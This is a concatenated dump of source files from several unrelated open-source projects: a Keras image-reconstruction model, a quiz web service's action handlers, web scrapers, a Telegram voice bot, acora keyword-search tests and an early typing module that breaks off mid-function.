class ConvolutionScaled(BaseScaled):
def _model(self):
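        # Three Conv2D layers in a 9-1-5 kernel arrangement (reminiscent of SRCNN):
        # patch extraction, non-linear mapping, and reconstruction over 640x360 RGB frames.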
model = Sequential()
model.add(
Conv2D(
64,
9,
padding='same',
activation='relu',
input_shape=(640, 360, 3),
))
model.add(
Conv2D(
32,
1,
padding='same',
activation='relu',
input_shape=(640, 360, 64),
))
model.add(
Conv2D(
3,
5,
padding='same',
activation='relu',
input_shape=(640, 360, 32),
))
model.compile(
optimizer=Adam(lr=1e-3),
loss='mse',
metrics=[psnr_loss],
)
return model
```
#### File: source/utils/keeper.py
```python
from os import path, makedirs
from shutil import rmtree
from PIL import Image
import numpy
class Keeper:
def __init__(self, bundle, model):
path_base = path.join(
path.dirname(__file__),
'..',
'..',
'dump',
)
self.__path_result = path.join(path_base, 'result', bundle, model)
if path.exists(self.__path_result):
rmtree(self.__path_result)
def save(self, file_name, data_src, data_mod, data_res):
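        # Write the source, modified and reconstructed frames as JPEGs into one folder per sample.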
path_res = path.join(self.__path_result, file_name)
if path.exists(path_res):
rmtree(path_res)
makedirs(path_res)
        for name, data in (('src', data_src), ('mod', data_mod), ('res', data_res)):
            data *= 255
            image = Image.fromarray(numpy.uint8(data))
            image = image.convert('RGB')
            file_name = path.join(path_res, f'{name}.jpeg')
            image.save(file_name, 'JPEG')
```
#### File: source/utils/plotter.py
```python
from matplotlib import pyplot
class Plotter:
def __init__(self, bundle, model):
self.__bundle = bundle
self.__model = model
def show(self, history):
if history is None:
return
pyplot.plot(history['loss'])
pyplot.title(f'model {self.__model} with bundle {self.__bundle} mse')
pyplot.ylabel('mse')
pyplot.xlabel('epoch')
pyplot.show()
pyplot.plot(history['psnr_loss'])
pyplot.title(f'model {self.__model} with bundle {self.__bundle} psnr')
pyplot.ylabel('psnr')
pyplot.xlabel('epoch')
pyplot.show()
``` |
{
"source": "1pkg/ReRe",
"score": 2
} |
#### File: source/actions/devote.py
```python
from json import loads
from base import Constant
from models import Effect, Setting
from .mixins import Crypto
class Devote(Crypto):
CACHE_EXPIRE = Constant.DEFAULT_CACHE_EXPIRE
def _process(self, request):
shaders = [{
'name': effect.name,
'code': loads(effect.shader),
'uniform': loads(effect.uniform),
} for effect in Effect.query]
setting = {
Setting.NAME_CHOSE_PERIOD:
Setting.get(Setting.NAME_CHOSE_PERIOD),
}
return {
'shaders': shaders,
'settings': setting,
}
```
#### File: source/actions/handshake.py
```python
from base import Action, Constant
from errors import Integrity, Overwhelm, Request
from models import Account, Device, Session
class Handshake(Action):
def _validate(self, request):
super()._validate(request)
validator = self._application.validator
datetime = self._application.datetime
http = self._application.http
settings = self._application.settings
self.__account_alias = self._get(request, 'alias')
self.__account_uuid = self._get(request, 'uuid', '')
self.__user_digest = self._get(request, 'digest')
self.__user_device = self._get(request, 'device')
self.__user_agent = http.useragent(request)
self.__user_ip = http.userip(request)
self.__integrity = self._get(request, 'integrity', '')
if not self.__integrity == settings[Constant.SETTING_INTEGRITY]:
raise Integrity()
if validator.isempty(self.__account_alias):
raise Request('alias', self.__account_alias)
if len(self.__account_uuid) != Constant.NORMAL_HASH_SIZE or \
not validator.ishex(self.__account_uuid):
raise Request('uuid', self.__account_uuid)
if validator.isempty(self.__user_digest):
raise Request('digest', self.__user_digest)
if not self.__user_device in Device.__members__:
raise Request('device', self.__user_device)
if validator.isempty(self.__user_agent):
raise Request('user_agent', self.__user_agent)
if validator.isempty(self.__user_ip):
raise Request('user_ip', self.__user_ip)
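        # Look the account up by uuid and throttle it if it already opened too many sessions today.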
self.__account = Account.query \
.filter(Account.uuid == self.__account_uuid) \
.first()
if self.__account is not None and \
Session.query \
.filter(Session.account_id == self.__account.id) \
.filter(Session.time_stamp >= datetime.date(-Constant.DAY_COUNT_SINGLE)) \
.count() > settings[Constant.SETTING_SESSION_DAILY_LIMIT]:
raise Overwhelm(self.__account.id)
def _process(self, request):
db = self._application.db
storage = self._application.storage
datetime = self._application.datetime
c_hash = self._application.hash
random = self._application.random
settings = self._application.settings
gift_threshold = settings[Constant.SETTING_FREEBIE_GIFT_THRESHOLD]
freebie_unit = settings[Constant.SETTING_SHARE_FREEBIE_UNIT]
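        # First contact creates the account; afterwards a freebie bonus is granted once every gift_threshold sessions.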
if self.__account is None:
self.__account = Account(
alias=self.__account_alias,
uuid=self.__account_uuid,
)
db.session.add(self.__account)
elif (len(self.__account.sessions) % gift_threshold) == 0:
self.__account.freebie += freebie_unit
storage.push(
self.__account.uuid,
f'''
Thank you for keeping using our service
We're glad to present you little bonus
{freebie_unit} freebie for you
''',
)
else:
storage.delete(self.__account.uuid)
alias = self.__account.alias
token = c_hash.hex(
c_hash.NORMAL_DIGEST,
datetime.timestamp(),
random.salt(),
self.__user_digest,
self.__user_device,
self.__user_agent,
self.__user_ip,
self.__integrity,
)
session = Session(
user_device=Device[self.__user_device],
user_digest=self.__user_digest,
user_agent=self.__user_agent,
user_ip=self.__user_ip,
token=token,
)
session.account = self.__account
db.session.commit()
return {
'alias': alias,
'token': token,
}
```
#### File: source/actions/mark.py
```python
from base import Constant
from errors import Request
from models import Mark as _Mark_, Type
from .mixins import Identify
class Mark(Identify):
CONNECTION_LIMIT = Constant.RIGID_CONNECTION_LIMIT
def _validate(self, request):
super()._validate(request)
self.__type = self._get(request, 'type', '')
if not self.__type in Type.__members__:
raise Request('type', self.__type)
self.__type = Type[self.__type]
def _process(self, request):
db = self._application.db
mark = _Mark_.query \
.filter(_Mark_.type == self.__type) \
.filter(_Mark_.task_id == self._task.id) \
.filter(_Mark_.session_id == self._session.id) \
.first()
if mark is None:
mark = _Mark_(type=self.__type)
mark.task = self._task
mark.session = self._session
db.session.commit()
```
#### File: actions/mixins/registration.py
```python
from base import Constant
from .access import Access
class Registration(Access):
def _registrate(self, task, answered):
storage = self._application.storage
datetime = self._application.datetime
settings = self._application.settings
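        # Remember which task this session is working on (and whether it was answered) for a limited time.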
identity = {
'task_id': task.id,
'answered': int(answered),
'token': self._session.token,
'timestamp': datetime.timestamp(),
}
storage.set(
self._session.token,
identity,
settings[Constant.SETTING_IDENTITY_TIMEOUT],
)
return task
```
#### File: source/actions/rating.py
```python
from base import Constant
from models import Account
from .mixins import Crypto
class Rating(Crypto):
CACHE_EXPIRE = Constant.DEFAULT_CACHE_EXPIRE
def _process(self, request):
db = self._application.db
settings = self._application.settings
admin = Account.query \
.filter(Account.alias == settings[Constant.SETTING_ADMIN_ALIAS]) \
.first()
accounts = Account.query \
.filter(Account.id != admin.id) \
.order_by(db.desc(Account.score)) \
.limit(settings[Constant.SETTING_RATING_TABLE_SIZE]).all()
return [
{'alias': account.alias, 'score': account.score}
for account in accounts
]
```
#### File: source/actions/share.py
```python
from base import Constant
from errors import Request
from models import Share as _Share_, Media
from .mixins import Access
class Share(Access):
CONNECTION_LIMIT = Constant.RIGID_CONNECTION_LIMIT
def _validate(self, request):
super()._validate(request)
self.__media = self._get(request, 'media', '')
if not self.__media in Media.__members__:
raise Request('media', self.__media)
self.__media = Media[self.__media]
def _process(self, request):
db = self._application.db
storage = self._application.storage
settings = self._application.settings
freebie_unit = settings[Constant.SETTING_SHARE_FREEBIE_UNIT]
if _Share_.query \
.filter(_Share_.media == self.__media) \
.filter(_Share_.session_id == self._session.id) \
.first() is None:
self._session.account.freebie += freebie_unit
storage.push(
self._session.account.uuid,
f'''
Thank you for sharing our service
We're glad to present you little bonus
{freebie_unit} freebie for you
''',
)
share = _Share_(media=self.__media)
share.session = self._session
db.session.commit()
```
#### File: source/actions/splash.py
```python
from base import Constant
from models import Answer, Subject, Task
from .mixins import Crypto
class Splash(Crypto):
WILDCARD_ENDPOINT = True
CACHE_EXPIRE = Constant.DEFAULT_CACHE_EXPIRE
def _process(self, request):
db = self._application.db
datetime = self._application.datetime
device = self._session.user_device
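        # Pick the task with the most answers over the last week for this device orientation, breaking ties randomly.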
task = Task.query \
.join(Subject, db.and_(
Subject.id == Task.subject_id,
Subject.orientation == device.orientation()
)) \
.join(Answer, db.and_(
Answer.task_id == Task.id,
Answer.time_stamp >= datetime.date(-Constant.DAY_COUNT_WEEK),
)) \
.group_by(Task.id) \
.order_by(
db.desc(db.func.count(Answer.id)),
db.func.random(),
).first()
if task is not None:
subject = {
'link': task.subject.link,
'orientation': str(task.subject.orientation),
}
effects = [{
'name': effect.name,
} for effect in task.effects]
return {
'subject': subject,
'effects': effects,
}
```
#### File: source/base/action.py
```python
from .constant import Constant
class Action:
WILDCARD_ENDPOINT = False
CACHE_EXPIRE = None
CONNECTION_LIMIT = Constant.RAREFIED_CONNECTION_LIMIT
def __init__(self, application):
self._application = application
def __call__(self, request):
self._validate(request)
data = self._process(request)
return self._format(data)
def _validate(self, request):
pass
def _process(self, request):
return NotImplemented
def _format(self, response=None):
return response
def _get(self, request, key, default=None):
if (request.json is not None and key in request.json):
return str(request.json[key])
return default
```
#### File: source/commands/sync_settings.py
```python
from os import path
from json import load
from base import Command
from models import Setting
class SyncSettings(Command):
NAME = 'sync-settings'
DESCRIPTION = 'Sync vcs settings with database.'
def execute(self):
settings = []
vsc_settings = self.__readsync()
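        # Reconcile the database with setting.json: drop removed settings, update existing values, add new ones.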
with self._application.instance.app_context():
for setting in Setting.query:
if setting.name not in vsc_settings:
self._application.db.session.delete(setting)
else:
vsc_setting = vsc_settings[setting.name]
setting.value = vsc_setting['value']
for _, vsc_setting in vsc_settings.items():
if Setting.query \
.filter(Setting.name == vsc_setting['name'])\
.first() is None:
setting = Setting(
name=vsc_setting['name'],
value=vsc_setting['value'],
)
settings.append(setting)
self._application.db.session.add_all(settings)
self._application.db.session.commit()
def __readsync(self):
settings = {}
file = path.join(
path.dirname(__file__),
'..',
'..',
'settings',
'setting.json',
)
with open(file) as data:
for setting in load(data):
settings[setting['name']] = {
'name': setting['name'],
'value': str(setting['value']),
}
return settings
```
#### File: source/models/subject.py
```python
from enum import Enum
from base import Alchemy
class Orientation(Enum):
portrait = 'portrait'
landscape = 'landscape'
def __str__(self):
return str(self.value)
class Subject(Alchemy.Model):
__tablename__ = 'subject'
id = Alchemy.Column(
Alchemy.Integer,
nullable=False,
primary_key=True,
)
link = Alchemy.Column(
Alchemy.String,
nullable=False,
unique=True,
)
source = Alchemy.Column(
Alchemy.String,
nullable=False,
)
orientation = Alchemy.Column(
Alchemy.Enum(Orientation),
nullable=False,
index=True,
)
option_id = Alchemy.Column(
Alchemy.Integer,
Alchemy.ForeignKey('option.id', ondelete='cascade'),
nullable=False,
index=True,
)
tasks = Alchemy.relationship(
'Task',
backref='subject',
passive_deletes=True,
)
```
#### File: testing/cases/fetch_case.py
```python
from .base_case import BaseCase
from actions import Fetch
class FetchCase(BaseCase):
def test_fetch_result(self):
return NotImplemented
```
#### File: testing/cases/mark_case.py
```python
from .base_case import BaseCase
from actions import Mark
class MarkCase(BaseCase):
def test_bad_type(self):
return NotImplemented
def test_mark_result(self):
return NotImplemented
```
#### File: testing/cases/rating_case.py
```python
from .base_case import BaseCase
from actions import Rating
class RatingCase(BaseCase):
def test_rating_result(self):
return NotImplemented
```
#### File: source/base/formatter.py
```python
from re import sub
from logging import Formatter
class Formatter(Formatter):
BASE_FORMAT = '%(asctime)s %(levelname)s %(name)s: %(message)s'
TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
def format(self, record):
        record.msg = sub(r'\s+', ' ', record.msg).strip()
return super().format(record)
```
#### File: source/keepers/json.py
```python
from json import dump
from base import Keeper
class Json(Keeper):
def __init__(self, file_name):
self.__file_name = file_name
def write(self, items):
with open(self.__file_name, 'w') as file:
dump(items, file, indent=4)
```
#### File: source/targets/listal.py
```python
from math import ceil
from re import search, IGNORECASE
from random import shuffle
from bs4 import BeautifulSoup
from base import Target
from fetchers import Tor
class Listal(Target):
MAIN_URL = 'http://www.listal.com/characters/most-rated/'
PAGE_SIZE = 45
DEFAULT_LIMIT = 2100
def __init__(self, image, wiki, logger, keepers, limit):
super().__init__(image, wiki, logger, keepers, limit)
self._fetcher = Tor(logger)
def _get_items(self):
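        # Page through the most-rated character listing, collect (url, title) pairs, then shuffle and truncate.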
items = []
for page in range(0, ceil(self._limit / self.PAGE_SIZE)):
query = f'{self.MAIN_URL}{page}'
response = self._dead_fetch(query)
response = BeautifulSoup(response.content, 'lxml')
for list_item in response.find_all('div', {'class': 'gridview'}):
information = list_item.find('a', {'class': 'image'})
url = information['href']
title = information['title'].strip()
items.append({
'url': url,
'title': title,
'category': 'Fictional Character',
})
shuffle(items)
return items[:self._limit]
def _from_target(self, url, title):
response = self._dead_fetch(url)
response = BeautifulSoup(response.content, 'lxml')
anchor = response.find('div', {'id': 'rightstuff'})
anchor = anchor.div.div
if anchor is not None:
description = anchor.text
return {
'name': title,
'description': description,
'link': url,
'source': 'listal',
}
return None
def _fix_option(self, option):
        if option is None or \
                option['name'] is None or \
                option['name'] == '' or \
                option['description'] is None or \
                option['description'] == '':
            return None
if option['source'] == 'listal' and \
search('duplicate', option['description'], IGNORECASE):
self._logger.warning('target skipping duplicateted')
return None
if search('(anime)|(manga)', option['description'], IGNORECASE):
self._logger.warning('target skipping (anime)|(manga)')
return None
if search('game character', option['description'], IGNORECASE):
self._logger.warning('target skipping game character')
return None
return super()._fix_option(option)
```
#### File: source/targets/paganwikiadeities.py
```python
from random import shuffle
from bs4 import BeautifulSoup
from base import Target
from fetchers import Tor
class PaganWikiaDeities(Target):
MAIN_URL = 'http://pagan.wikia.com/wiki/List_of_Deities'
DEFAULT_LIMIT = None
def __init__(self, image, wiki, logger, keepers, limit):
super().__init__(image, wiki, logger, keepers, limit)
self._fetcher = Tor(logger)
def _get_items(self):
items = []
response = self._dead_fetch(self.MAIN_URL)
response = BeautifulSoup(response.content, 'lxml')
article = response.find('div', {'id': 'WikiaArticle'})
for list_item in article.find_all('li'):
anchors = list_item.find_all('a')
if not len(anchors) == 0:
title = anchors[0].string.strip()
items.append({
'url': None,
'title': title,
'category': 'Deity',
})
shuffle(items)
return items[:self._limit]
def _from_target(self, url, title):
return None
``` |
{
"source": "1Prototype1/aiopentdb",
"score": 3
} |
#### File: aiopentdb/aiopentdb/errors.py
```python
__all__ = ('OpenTDBError', 'NoResults', 'InvalidParameter', 'TokenNotFound', 'TokenEmpty')
class OpenTDBError(Exception):
"""Base error class for all OpenTDB related errors."""
class NoResults(OpenTDBError):
"""Error raised when the API could not return any result.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('could not return results')
class InvalidParameter(OpenTDBError):
"""Error raised when the arguments passed during an API call are invalid.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('arguments passed in are not valid')
class TokenNotFound(OpenTDBError):
"""Error raised when a session token is not found.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('session token does not exist')
class TokenEmpty(OpenTDBError):
"""Error raised when a session token is empty.
This error is a subclass of :class:`.OpenTDBError`.
"""
def __init__(self):
super().__init__('session token has returned all possible questions')
``` |
{
"source": "1-punchMan/models",
"score": 2
} |
#### File: transformer/utils/others.py
```python
import importlib.util, sys
def from_path_import(name, path, globals, demands=[]):
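    # Load a module from an explicit file path, register it in sys.modules,
    # and copy each requested name into the caller-supplied globals dict.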
spec = importlib.util.spec_from_file_location(name, path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
sys.modules[name] = module
for demand in demands:
globals[demand] = getattr(module, demand)
``` |
{
"source": "1push/telegram-fargusbot",
"score": 2
} |
#### File: 1push/telegram-fargusbot/bot.py
```python
import os
import logging
from uuid import uuid4
from telegram import InlineQueryResultVoice
from telegram.ext import Updater, InlineQueryHandler, CommandHandler
# Enable logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.WARNING)
logger = logging.getLogger(__name__)
# Get a new dictionary on every launch
data = {}
with open("dict.csv", "r") as file:
    next(file)  # skip the header row
    for line in file:
        item = line.split(',')
        data[item[0]] = item[1]
def get_audio_names(query):
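    # Return up to 10 matching audio keys plus their display titles (trailing newline stripped).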
result = list(filter(lambda key: data[key].find(query) != -1, data.keys()))[:10]
return result, [data[key][:-1] for key in result]
# Define a few command handlers
def error(update, context):
logger.warning('Update "%s" caused error "%s"', update, context.error)
def start(update, context):
update.message.reply_text('черт фил ты пьешь эту гадость тебе не надо было это пить')
def help(update, context):
update.message.reply_text("""
...
""")
def inlinequery(update, context):
query = update.inline_query.query
audio_names, titles = get_audio_names(query)
    results = [
        InlineQueryResultVoice(id=str(uuid4()),
                               voice_url=f'https://raw.githubusercontent.com/tiulpin/tg-fargusbot/master/opus/{audio_name}.ogg',
                               title=title) for audio_name, title in zip(audio_names, titles)]
update.inline_query.answer(results)
def main():
updater = Updater(os.environ['TELEGRAM_TOKEN'], use_context=True)
dp = updater.dispatcher
dp.add_error_handler(error)
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("help", help))
dp.add_handler(InlineQueryHandler(inlinequery))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
``` |
{
"source": "1pxone/neo4j-javascript-driver",
"score": 2
} |
#### File: neo4j-javascript-driver/testkit/stress.py
```python
import subprocess
import os
def run(args):
subprocess.run(
args, universal_newlines=True, stderr=subprocess.STDOUT, check=True)
def test_driver():
run(["gulp", "run-stress-tests-without-jasmine"])
def test_driver_lite():
return
if __name__ == "__main__":
os.environ['STRESS_TEST_MODE'] = 'fastest'
    # os.environ values must be strings, so coerce the duration (defaults to 0 seconds).
    os.environ['RUNNING_TIME_IN_SECONDS'] = \
        str(os.environ.get('TEST_NEO4J_STRESS_DURATION', 0))
if os.environ.get("TEST_DRIVER_LITE", False):
test_driver_lite()
else:
test_driver()
``` |
{
"source": "1py/acora",
"score": 2
} |
#### File: 1py/acora/test.py
```python
import acora
if acora.BytesAcora is acora.PyAcora or acora.UnicodeAcora is acora.PyAcora:
print("WARNING: '_acora' C extension not imported, only testing Python implementation")
import re
import sys
import unittest
import codecs
import string
# compat stuff ...
try:
unicode
except NameError:
unicode = str
try:
bytes
except NameError:
bytes = str
try:
# Python 2.6+
from io import StringIO as _StringIO, BytesIO as _BytesIO
except ImportError:
# Python 2
from StringIO import StringIO as _StringIO
_BytesIO = _StringIO
def BytesIO(*args):
if args and isinstance(args[0], unicode):
args = (args[0].encode("UTF-8"),)
return _BytesIO(*args)
def StringIO(*args):
if args and isinstance(args[0], bytes):
args = (args[0].decode("UTF-8"),)
    return _StringIO(*args)
unicode_unescaper = codecs.lookup("unicode_escape")
def unescape_unicode(s):
return unicode_unescaper.decode(s)[0]
def prepare_test_data():
s = ('bdfdaskdjfhaslkdhfsadhfklashdflabcasdabcdJAKHDBVDFLNFCBLSADHFCALKSJ'
'jklhcnajskbhfasjhancfksjdfhbvaliuradefhzcbdegnashdgfbcjaabesdhgkfcnash'
'fdkhbdegxcbgjsvdhabcabcfcgbnxahsdbgfbcakjsdhgnfcxsababcmdabe')
s = s.lower() + s + s.upper()
search_string = s * 1000
all_keywords = [
'ab', 'abc', 'abcd', 'abcabc', 'ababc', 'ABBBC', 'ABCABC',
'bdfd', 'ade', 'abe', 'bdeg', 'fklash',
'gnfcxsababcmdabe', 'SADHFCAL',
'notthere', 'not-to-be-found', 'not-to-be-found-either',
]
if sys.version_info[0] < 3:
all_keywords = list(map(unicode, all_keywords))
search_string = unicode(search_string)
return search_string, all_keywords
class AcoraTest(object):
search_string, all_keywords = prepare_test_data()
def _build(self, *keywords):
keywords = list(map(self._swrap, keywords))
return acora.AcoraBuilder(*keywords).build(acora=self.acora)
def _build_ignore_case(self, *keywords):
keywords = list(map(self._swrap, keywords))
return acora.AcoraBuilder(*keywords).build(
ignore_case=True, acora=self.acora)
def _result(self, result):
s = self._swrap
return [ (s(k), pos) for k,pos in result ]
# basic tests
def test_finditer_single_keyword(self):
s = self._swrap
finditer = self._build('bc').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('bc', 1)]))
def test_finditer_many_keywords(self):
s = self._swrap
finditer = self._build(*string.ascii_letters).finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('a', 0), ('b', 1), ('c', 2), ('d', 3)]))
def test_finditer_many_keywords_not_found(self):
s = self._swrap
finditer = self._build(*string.ascii_letters).finditer
self.assertEquals(sorted(finditer(s(string.digits*100))), [])
def test_finditer_sequential(self):
s = self._swrap
finditer = self._build('a', 'b', 'c', 'd').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('a', 0), ('b', 1), ('c', 2), ('d', 3)]))
def test_finditer_redundant(self):
s = self._swrap
finditer = self._build('a', 'b', 'A', 'B').finditer
self.assertEquals(
sorted(finditer(s('AaBb'))),
self._result([('A', 0), ('B', 2), ('a', 1), ('b', 3)]))
def test_finditer_overlap(self):
s = self._swrap
finditer = self._build('a', 'ab', 'abc', 'abcd').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('a', 0), ('ab', 0), ('abc', 0), ('abcd', 0)]))
def test_finditer_reverse_overlap(self):
s = self._swrap
finditer = self._build('d', 'cd', 'bcd', 'abcd').finditer
self.assertEquals(
sorted(finditer(s('abcd'))),
self._result([('abcd', 0), ('bcd', 1), ('cd', 2), ('d', 3)]))
def test_deepcopy_builder(self):
from copy import deepcopy
s = self._swrap
builder1 = acora.AcoraBuilder(*list(map(s, ['a', 'b', 'c'])))
builder2 = deepcopy(builder1)
builder2.add(s('ab'), s('bc'))
finditer1 = builder1.build(acora=self.acora).finditer
finditer2 = builder2.build(acora=self.acora).finditer
self.assertEquals(
sorted(finditer1(s('abcd'))),
self._result([('a', 0), ('b', 1), ('c', 2)]))
self.assertEquals(
sorted(finditer2(s('abcd'))),
self._result([('a', 0), ('ab', 0), ('b', 1), ('bc', 1), ('c', 2)]))
class UnicodeAcoraTest(unittest.TestCase, AcoraTest):
# only unicode data tests
from acora import UnicodeAcora as acora
def _swrap(self, s):
if not isinstance(s, unicode):
s = s.decode('utf-8')
return unescape_unicode(s)
def test_finditer_line_endings(self):
s = self._swrap
finditer = self._build_ignore_case('a', 'b', 'c', 'd', '\r', '\n').finditer
line = 0
line_matches = []
current_line_matches = []
last_ending = None
for kw, pos in finditer(s('Aa\r\nB\nbC\n\rcD\r\nd')):
if kw in '\r\n':
if last_ending == '\r' and kw == '\n':
continue
line_matches.append(tuple(current_line_matches))
del current_line_matches[:]
last_ending = kw
line += 1
else:
last_ending = None
current_line_matches.append(kw)
line_matches.append(tuple(current_line_matches))
self.assertEquals(line, 5)
self.assertEquals(
line_matches,
[('a', 'a'), ('b',), ('b', 'c'), (), ('c', 'd'), ('d',)])
def test_finditer_single_keyword_unicode(self):
s = self._swrap
finditer = self._build(unicode("\\uF8D2")).finditer
self.assertEquals(
list(finditer(s(unicode("\\uF8D1\\uF8D2\\uF8D3")))),
self._result([(unicode("\\uF8D2"), 1)]))
def test_finditer_ignore_case(self):
s = self._swrap
finditer = self._build_ignore_case('a', 'b', 'c', 'd').finditer
self.assertEquals(
sorted(finditer(s('AaBbCcDd'))),
self._result([('a', 0), ('a', 1), ('b', 2), ('b', 3),
('c', 4), ('c', 5), ('d', 6), ('d', 7)]))
def test_finditer_ignore_case_redundant(self):
s = self._swrap
finditer = self._build_ignore_case('a', 'b', 'A', 'B').finditer
self.assertEquals(
sorted(finditer(s('AaBb'))),
self._result([('A', 0), ('A', 1), ('B', 2), ('B', 3),
('a', 0), ('a', 1), ('b', 2), ('b', 3)]))
class BytesAcoraTest(unittest.TestCase, AcoraTest):
# only byte data tests
from acora import BytesAcora as acora
simple_data = 'abc' + ('a'*100+'b'*100)*1000 + 'abcde'
simple_kwds = ['abc'.encode('ASCII'),
'abcde'.encode('ASCII')]
last_match_pos = len(simple_data) - 5
expected_result = [(simple_kwds[0], 0),
(simple_kwds[0], last_match_pos),
(simple_kwds[1], last_match_pos)]
def _swrap(self, s):
if isinstance(s, unicode):
s = s.encode('ISO-8859-1')
return s
def _search_in_file(self, ac, data):
import tempfile
tmp = tempfile.TemporaryFile()
try:
tmp.write(data.encode('ASCII'))
tmp.seek(0)
return list(ac.filefind(tmp))
finally:
tmp.close()
def test_large_filelike_searching(self):
filefind = self._build('SADHFCAL'.encode('ASCII'),
'bdeg'.encode('ASCII')).filefind
data = BytesIO(self.search_string)
result = list(filefind(data))
self.assertEquals(len(result), 6000)
def test_large_filelike_searching_check(self):
ac = self._build(*self.simple_kwds)
data = BytesIO(self.simple_data)
result = list(ac.filefind(data))
self.assertEquals(result, self.expected_result)
def test_file_searching(self):
ac = self._build([ kw.encode('ASCII')
for kw in ('a', 'b', 'ab', 'abc') ])
result = self._search_in_file(ac, 'abbabc')
self.assertEquals(len(result), 8)
def test_large_file_searching(self):
ac = self._build('SADHFCAL'.encode('ASCII'),
'bdeg'.encode('ASCII'))
result = self._search_in_file(ac, self.search_string)
self.assertEquals(len(result), 6000)
def test_large_file_searching_check(self):
ac = self._build(*self.simple_kwds)
result = self._search_in_file(ac, self.simple_data)
self.assertEquals(result, self.expected_result)
def test_binary_data_search(self):
pattern = self._swrap('\xa5\x66\x80')
ac = self._build(pattern)
mainString = self._swrap(10 * '\xf0') + pattern + self._swrap(10 * '\xf0')
result = ac.findall(mainString)
self.assertEquals(result, [(pattern, 10)])
def test_binary_data_search_start(self):
pattern = self._swrap('\xa5\x66\x80')
ac = self._build(pattern)
mainString = pattern + self._swrap(10 * '\xf0')
result = ac.findall(mainString)
self.assertEquals(result, [(pattern, 0)])
def test_binary_data_search_end(self):
pattern = self._swrap('\xa5\x66\x80')
ac = self._build(pattern)
mainString = self._swrap(10 * '\xf0') + pattern
result = ac.findall(mainString)
self.assertEquals(result, [(pattern, 10)])
class PyAcoraTest(UnicodeAcoraTest, BytesAcoraTest):
# both types of tests work here
from acora import PyAcora as acora
test_binary_data_search = None
test_binary_data_search_start = None
test_binary_data_search_end = None
def _swrap(self, s):
if isinstance(s, unicode):
s = unescape_unicode(s)
return s
def suite():
import doctest
suite = unittest.TestSuite([
unittest.makeSuite(UnicodeAcoraTest),
unittest.makeSuite(BytesAcoraTest),
unittest.makeSuite(PyAcoraTest),
doctest.DocTestSuite(),
doctest.DocFileSuite('README.rst'),
])
return suite
if __name__ == "__main__":
import sys
args = sys.argv[1:]
verbosity = min(2, args.count('-v') + args.count('-vv')*2)
unittest.TextTestRunner(verbosity=verbosity).run(suite())
``` |
{
"source": "1py/mypy",
"score": 3
} |
#### File: lib-typing/3.2/typing.py
```python
from abc import ABCMeta, abstractmethod, abstractproperty
import inspect
import sys
import re
__all__ = [
# Type system related
'AbstractGeneric',
'AbstractGenericMeta',
'Any',
'Dict',
'Generic',
'GenericMeta',
'IO',
'List',
'Match',
'Pattern',
'Protocol',
'Set',
'Tuple',
'Undefined',
'cast',
'forwardref',
'overload',
'typevar',
# Protocols and abstract base classes
'Container',
'Iterable',
'Iterator',
'Sequence',
'Sized',
'AbstractSet',
'Mapping',
'BinaryIO',
'TextIO',
]
def builtinclass(cls):
"""Mark a class as a built-in/extension class for type checking."""
return cls
def ducktype(type):
"""Return a duck type declaration decorator.
The decorator only affects type checking.
"""
def decorator(cls):
return cls
return decorator
def disjointclass(type):
"""Return a disjoint class declaration decorator.
The decorator only affects type checking.
"""
def decorator(cls):
return cls
return decorator
class GenericMeta(type):
"""Metaclass for generic classes that support indexing by types."""
def __getitem__(self, args):
# Just ignore args; they are for compile-time checks only.
return self
class Generic(metaclass=GenericMeta):
"""Base class for generic classes."""
class AbstractGenericMeta(ABCMeta):
"""Metaclass for abstract generic classes that support type indexing.
This is used for both protocols and ordinary abstract classes.
"""
def __new__(mcls, name, bases, namespace):
cls = super().__new__(mcls, name, bases, namespace)
# 'Protocol' must be an explicit base class in order for a class to
# be a protocol.
cls._is_protocol = name == 'Protocol' or Protocol in bases
return cls
def __getitem__(self, args):
# Just ignore args; they are for compile-time checks only.
return self
class Protocol(metaclass=AbstractGenericMeta):
"""Base class for protocol classes."""
@classmethod
def __subclasshook__(cls, c):
if not cls._is_protocol:
# No structural checks since this isn't a protocol.
return NotImplemented
if cls is Protocol:
# Every class is a subclass of the empty protocol.
return True
# Find all attributes defined in the protocol.
attrs = cls._get_protocol_attrs()
for attr in attrs:
if not any(attr in d.__dict__ for d in c.__mro__):
return NotImplemented
return True
@classmethod
def _get_protocol_attrs(cls):
# Get all Protocol base classes.
protocol_bases = []
for c in cls.__mro__:
if getattr(c, '_is_protocol', False) and c.__name__ != 'Protocol':
protocol_bases.append(c)
# Get attributes included in protocol.
attrs = set()
for base in protocol_bases:
for attr in base.__dict__.keys():
# Include attributes not defined in any non-protocol bases.
for c in cls.__mro__:
if (c is not base and attr in c.__dict__ and
not getattr(c, '_is_protocol', False)):
break
else:
if (not attr.startswith('_abc_') and
attr != '__abstractmethods__' and
attr != '_is_protocol' and
attr != '__dict__' and
attr != '_get_protocol_attrs' and
attr != '__module__'):
attrs.add(attr)
return attrs
class AbstractGeneric(metaclass=AbstractGenericMeta):
"""Base class for abstract generic classes."""
class TypeAlias:
"""Class for defining generic aliases for library types."""
def __init__(self, target_type):
self.target_type = target_type
def __getitem__(self, typeargs):
return self.target_type
# Define aliases for built-in types that support indexing.
List = TypeAlias(list)
Dict = TypeAlias(dict)
Set = TypeAlias(set)
Tuple = TypeAlias(tuple)
Function = TypeAlias(callable)
Pattern = TypeAlias(type(re.compile('')))
Match = TypeAlias(type(re.match('', '')))
class typevar:
def __init__(self, name, *, values=None):
self.name = name
self.values = values
# Predefined type variables.
AnyStr = typevar('AnyStr', values=(str, bytes))
class forwardref:
def __init__(self, name):
self.name = name
def Any(x):
"""The Any type; can also be used to cast a value to type Any."""
return x
def cast(type, object):
"""Cast a value to a type.
This only affects static checking; simply return object at runtime.
"""
return object
def overload(func):
"""Function decorator for defining overloaded functions."""
